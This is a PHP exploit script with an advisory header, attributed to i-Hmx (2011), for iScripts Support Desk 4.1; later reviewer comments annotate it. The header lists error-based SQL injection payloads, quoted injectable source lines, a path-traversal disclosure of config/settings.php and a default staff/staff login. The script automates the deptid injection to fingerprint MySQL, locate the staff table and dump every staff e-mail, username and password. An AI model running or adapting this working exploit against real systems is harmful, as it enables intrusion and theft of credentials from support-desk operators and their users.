`<?
/*
[+] iScripts Support desk version 4.1
[+] SQL injection / local file disclosure advisory with a PoC script (error-based SQLi)
[+] Vuln & Exploit By i-Hmx
[+] sec4ever.com , 1337s.cc
Note: the script opens with the short tag "<?"; it only runs with short_open_tag=On (disabled in the shipped php.ini-production / php.ini-development) unless the tag is changed to "<?php".
I. SQL injection vulnerabilities
> Error-based SQL injection (duplicate-entry trick: count(*) with concat(value, floor(rand(0)*2)) grouped by x makes MySQL raise an error whose message echoes the selected value)
postticketbeforeregistersave.php — the injection point is the deptid POST field; the payload carries no quote, so the value is evidently used unquoted in the query.
Staff table name (offset 33 of the current schema's table list; that offset is install-specific and may point at a different table elsewhere). Transcription notes: the closing star-slash of the versioned comment is omitted in the payloads of this section because this text sits inside a PHP block comment — see the script's payloads for the complete form; "&notlogin=NOTLOGIN" had been decoded to "¬login" in the published copy and is restored below; the e-mail field shows "[email protected]" because the hosting site's address obfuscation replaced the original, whose name/value is not recoverable from this listing.
post : txtname=faris&[email protected]&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,unhex(Hex(cast(table_name as char))),0x27,0x7e) from `information_schema`.tables where table_schema=database() limit 33,1)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and faris=13373r&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S&notlogin=NOTLOGIN
Dump staff e-mail, login and password (sptbl_staffs.vMail ^ vLogin ^ vPassword, one row per request via limit N,1)
Post : txtname=faris&[email protected]&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,unhex(Hex(cast(sptbl_staffs.vMail as char))),0x5e,unhex(Hex(cast(sptbl_staffs.vLogin as char))),0x5e,unhex(Hex(cast(sptbl_staffs.vPassword as char))),0x27,0x7e) from sptbl_staffs limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and faris=13373r&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S&notlogin=NOTLOGIN
> Further injection points (labelled "Blind" by the author; only the vulnerable source lines are quoted, no extraction payload is given — each one concatenates a request parameter straight into the SQL string)
/onlinetest.php
$comp = $_GET["comp"];
include("./config/settings.php");
include("./includes/functions/dbfunctions.php");
$conn = getConnection();
$sql_img = "select vChatIcon from sptbl_companies where nCompId='".$comp."'";
$res_img = executeSelect($sql_img,$conn);
if ( mysql_num_rows($res_img) > 0 ) {
Exploit : /onlinetest.php?comp=1  (the injectable parameter is comp, read by $_GET["comp"] above; the original listing's "id" is a typo)
/client_prechat.php
Line 3 : if ($_POST["comp"] !='' ) $comp = $_POST["comp"];
Line 245 :
$sql_dpt = "SELECT d.nDeptId, d.vDeptDesc FROM sptbl_depts d INNER JOIN sptbl_companies c
ON ( d.nCompId = c.nCompId ) WHERE d.nCompId = '".$comp."' ORDER BY d.vDeptDesc";
$res_dpt = executeSelect($sql_dpt,$conn);
Exploit as : site.com/supportdesk/client_prechat.php
Post parameter : comp=%inject_here%
/getChatIcon_det.php
Line 2 : $comp = $_GET["comp"];
Line 39 :
$sql = "select s.nStaffId from sptbl_staffs s inner join sptbl_staffdept sd on ( s.nStaffId = sd.nStaffId ) inner join sptbl_depts d on ( sd.nDeptId = d.nDeptId ) where s.vOnline='1' and s.vDelStatus='0' and d.nCompId='".$comp."'";
$result = executeSelect($sql,$conn);
if ( mysql_num_rows($result) > 0 ) {
$img_src = "images/chat/chat-icon-".$img_id."-online.gif";
} else {
$img_src = "images/chat/chat-icon-".$img_id."-offline.gif";
}
Exploit as : site.com/supportdesk/getChatIcon_det.php?comp=1
/getChatUpdates.php
if ( $_SESSION['sess_userid'] == "" ) echo "##X";
// Only reachable with a client session (sess_userid set), i.e. after logging in as an ordinary user; otherwise the handler prints "##X" and runs no query.
else {
$mod = isset( $_GET['mod']) ? $_GET['mod'] : '' ;
$chatid = isset( $_GET['chatid']) ? $_GET['chatid'] : '' ;
$conn = getConnection();
$sql = "Select tMatter from sptbl_chat where nChatId='".$chatid."'";
$result = executeSelect($sql,$conn);
$rowcnt_chatUpd = mysql_num_rows($result);
Exploit : Login then Inject here > site.com/supportdesk/getChatUpdates.php?chatid=1  (the query interpolates $chatid from $_GET['chatid']; the original listing said "comp")
Send the authenticated session cookie along with the injection requests (the author used Havij); without it every request stops at the "##X" branch above.
II.Local File Disclosure
admin/csvdownload.php
$filename="../csvfiles/".addslashes($_GET["id"]);
header('Content-Description: File Transfer');
header('Content-Type: application/force-download');
header('Content-Length: ' . filesize($filename));
header('Content-Disposition: attachment; filename=' . basename($filename));
readfile($filename);
Exploit as : admin/csvdownload.php?id=../config/settings.php
(addslashes() only escapes quotes, backslashes and NUL — it does nothing against "../", so the path resolves to ../config/settings.php relative to admin/ and readfile() serves the PHP source, presumably including the database settings loaded by includes elsewhere. No session check is visible in the excerpt; confirm whether admin/ enforces one before assuming pre-auth access.)
III. phpinfo() exposure
/phpinfo.php is reportedly shipped with the application; where reachable it discloses PHP version, build options, loaded modules, filesystem paths and environment variables that help the attacks above.
IV. Hard-coded staff account
Observed on the copy the author tested, which may have been a nulled release; not confirmed for official builds.
A staff member exists out of the box with
user : staff
pass : staff
Treat it as a default credential: check for it on any deployment and remove or rotate it.
*/
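// CLI entry: the only argument is the target's base URL (the usage example
// shows a trailing slash).  $argc/$argv come from the CLI SAPI; testing $argc
// first avoids an undefined-index notice when no argument was given, which the
// original `!$argv[1]` triggered before printing the usage text.
if ($argc < 2 || !$argv[1])
{
echo "\n[+] usage : php ".$argv[0]." [Target]\nex : php ".$argv[0]." http://site.com/support/\n";
exit();
}
echo "[+] iScripts Support Desk Sql Injection Exploit \n";
echo "[-] Exploited By i-Hmx \n";
echo "[-] sec4ever.com , 1337s.cc\n";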
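/**
 * Return the text between the first occurrence of $start and the following
 * occurrence of $end in $string, or "" when either marker is missing.
 *
 * Used to cut the extracted value out of the target's error page, which the
 * injected payloads bracket with sentinel strings (">>" ... "<<").
 *
 * @param string $string haystack (HTTP response body)
 * @param string $start  opening sentinel
 * @param string $end    closing sentinel
 * @return string the enclosed text, "" if not found
 */
function kastr($string, $start, $end){
    // strpos() returns false when the marker is absent; compare strictly
    // instead of relying on the original's " " prefix / == 0 trick.
    $from = strpos($string, $start);
    if ($from === false) return "";
    $from += strlen($start);
    $to = strpos($string, $end, $from);
    // The original computed a negative length here when $end was missing,
    // so substr() returned a truncated tail instead of nothing.
    if ($to === false) return "";
    return substr($string, $from, $to - $from);
}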
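/**
 * POST the injection body to postticketbeforeregistersave.php on the target
 * and return the raw response body (the MySQL error page carrying the data).
 *
 * @param string $url base URL of the support desk, e.g. http://site.com/support/
 *                    (a missing trailing slash is tolerated)
 * @param string $inj url-encoded POST body carrying the injected deptid value
 * @return string response body; "" when the transport failed — the cURL error
 *                is written to STDERR so a dead or unreachable host is not
 *                reported as "not vulnerable" by the caller
 */
function faexploit($url,$inj){
    $target = rtrim($url, '/') . '/postticketbeforeregistersave.php';
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_URL, $target);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 0);
    curl_setopt($curl, CURLOPT_POST, 1);
    curl_setopt($curl, CURLOPT_POSTFIELDS, $inj);
    curl_setopt($curl, CURLOPT_TIMEOUT, 20);
    $body = curl_exec($curl);
    if ($body === false) {
        // The original returned false here, which the caller silently
        // treated as "sentinel not found".
        fwrite(STDERR, "[!] request to " . $target . " failed: " . curl_error($curl) . "\n");
        $body = "";
    }
    curl_close($curl);
    return $body;
}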
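/**
 * Build the POST body for one error-based extraction request.
 *
 * All four requests are the author's payload with only the extracted
 * expression and the trailing boolean term varying: the deptid field carries
 * a MySQL versioned comment (/*!1337 ..., executed by every MySQL release)
 * appending "and (select 1 from (select count(*),concat(<value>,floor(rand(0)*2))x
 * from information_schema.tables group by x)a)"; the duplicate group key makes
 * MySQL raise an error whose text echoes <value>, which the payloads bracket
 * with ">>" (0x3e3e) and "<<" (0x3c3c) so kastr() can cut it out.
 *
 * NOTE(review): two fields were garbled in the published copy. "&notlogin=NOTLOGIN"
 * had become "¬login" (HTML "&not" entity decoding) and is restored here. The
 * e-mail field shows "[email protected]" because the hosting site's address
 * obfuscation replaced the original; that name/value is not recoverable from
 * this listing, so confirm it against the form on
 * postticketbeforeregistersave.php before relying on the request.
 *
 * @param string $value scalar subselect yielding the ">>...<<"-wrapped string
 * @param string $guard trailing boolean term ("1=1" or the author's
 *                      "faris=13373r"), kept exactly as in the original
 * @return string url-encoded POST body
 */
function build_payload($value, $guard) {
    $head = 'txtname=faris&[email protected]&prty=0&deptid=11 /*!1337and(select 1 from(select count(*),concat(';
    $tail = ',floor(rand(0)*2))x from `information_schema`.tables group by x)a) and ';
    $end  = '*/&tckttitle=fuck&tcktdesc=xxxxxxxxxxxxxxxxx&postback=S&notlogin=NOTLOGIN';
    return $head . $value . $tail . $guard . $end;
}

/**
 * Escape control characters in data that came back from the target before it
 * is echoed: the response body is attacker-controlled from the operator's
 * point of view, and a hostile or honeypot host could otherwise push terminal
 * escape sequences through this tool.
 *
 * @param string $s raw extracted value
 * @return string the value with bytes 0x00-0x1f and 0x7f C-escaped
 */
function safe_out($s) {
    return addcslashes($s, "\x00..\x1f\x7f");
}

// 1. Fingerprint: the sentinel "farsawy" (0x66617273617779) only shows up in
//    the response when the injected subquery ran and its error text was echoed.
$version = faexploit($argv[1], build_payload(
    '(select (select concat(0x66617273617779,0x3e3e,unhex(Hex(cast(version() as char))),0x3c3c)) from `information_schema`.tables limit 0,1)',
    '1=1'));
if (preg_match("/farsawy/", (string) $version))
{
    $ver = kastr($version, ">>", "<<");
    echo "[-] Mysql Version : " . safe_out($ver) . "\n";

    // 2. Staff table name. The author found it at offset 33 of the current
    //    schema's table list; the offset is install-specific, so fall back to
    //    the name the advisory observed (sptbl_staffs) when nothing usable
    //    comes back, and refuse to splice a non-identifier into the next query.
    $tbl = faexploit($argv[1], build_payload(
        '(select (select (select distinct concat(0x3e3e,unhex(Hex(cast(table_name as char))),0x3c3c) from `information_schema`.tables where table_schema=database() limit 33,1)) from `information_schema`.tables limit 0,1)',
        'faris=13373r'));
    $stf = kastr($tbl, ">>", "<<");
    if ($stf === '' || !preg_match('/^\w+$/', $stf)) {
        fwrite(STDERR, "[!] could not read the staff table name (got \"" . safe_out($stf) . "\"), assuming sptbl_staffs\n");
        $stf = 'sptbl_staffs';
    } elseif (!preg_match('/staff/i', $stf)) {
        fwrite(STDERR, "[!] table at offset 33 is \"" . $stf . "\"; the offset may not match this install\n");
    }
    echo "[-] Staffs table name : $stf\n";

    // 3. Row count, then one row per request (vMail:vLogin:vPassword).  The
    //    original hard-coded sptbl_staffs here while using $stf below.
    $numb = faexploit($argv[1], build_payload(
        '(select (select (select concat(0x3e3e,count(*),0x3c3c) from ' . $stf . ')) from `information_schema`.tables limit 0,1)',
        '1=1'));
    $num = (int) kastr($numb, ">>", "<<");
    echo "[-] Number of staff members : $num\n";
    echo "[-] Staffs data ordered as : Email : Username: Password\n";
    for ($f = 0; $f < $num; $f++)
    {
        $data = faexploit($argv[1], build_payload(
            '(select (select (select concat(0x3e3e,unhex(Hex(cast(vMail as char))),0x3a,unhex(Hex(cast(vLogin as char))),0x3a,unhex(Hex(cast(vPassword as char))),0x3c3c) from ' . $stf . ' limit ' . $f . ',1) ) from `information_schema`.tables limit 0,1)',
            'faris=13373r'));
        $ok = kastr($data, ">>", "<<");
        echo " " . safe_out($ok) . "\n";
    }
    echo "[+] Done\n";
    exit(" Greets From Faris ;)");
}
else
{
    echo "[-] Target Not vulnerable\n";
    echo "[+] Exit\n";
    exit();
}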
// 07/2011
// i-Hmx
?>
`